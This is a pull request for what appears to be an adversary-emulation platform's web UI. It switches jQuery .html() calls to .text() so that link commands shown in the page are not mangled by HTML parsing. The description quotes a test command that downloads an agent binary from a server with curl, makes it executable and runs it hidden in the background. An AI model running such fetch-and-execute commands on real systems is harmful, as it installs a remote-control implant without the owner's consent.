### PR TITLE
Forcing text on potential links

### DIFF
--- a/templates/operations.html
+++ b/templates/operations.html
@@ -579,12 +579,12 @@
             if(!(techniqueFilter === '-- any --' || typeof techniqueFilter === 'undefined') && !(techniqueFilter === ("technique-"+link.ability.technique_id)))
                 continue;/**/
             template.attr('id', uniqueLinkId);
-            template.find('#potential-name').html(link.ability.name);
-            template.find('#potential-technique').html(link.ability.technique_id+' - '+link.ability.technique_name+' ('+link.ability.tactic+')')
-            template.find('#potential-description').html(link.ability.description);
-            template.find('#potential-command').html(atob(link.command));
-            template.find('#potential-score').html(link.score);
-            template.find('#potential-visibility').html(link.visibility.score);
+            template.find('#potential-name').text(link.ability.name);
+            template.find('#potential-technique').text(link.ability.technique_id+' - '+link.ability.technique_name+' ('+link.ability.tactic+')')
+            template.find('#potential-description').text(link.ability.description);
+            template.find('#potential-command').text(atob(link.command));
+            template.find('#potential-score').text(link.score);
+            template.find('#potential-visibility').text(link.visibility.score);
             template.data('link', link);
             template.show();
             if($("#potential-link-tactic-filter option[value='tactic-"+link.ability.tactic+"'").length === 0){


### PR DESCRIPTION
## Description

If the link command contains text which can be rendered as html, the `html()` command will modify the link command. Since this command in the UI is sent directly to the agent, this can cause unintended changes to the command.

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)

## How Has This Been Tested?

A link containing the following was truncated at `...-group red &>/dev/null ` (at the `<`):

```
'server="#{server}";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;chmod +x sandcat.go;echo "Running agent";nohup ./sandcat.go -server $server -group red &>/dev/null </dev/null &';
```

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
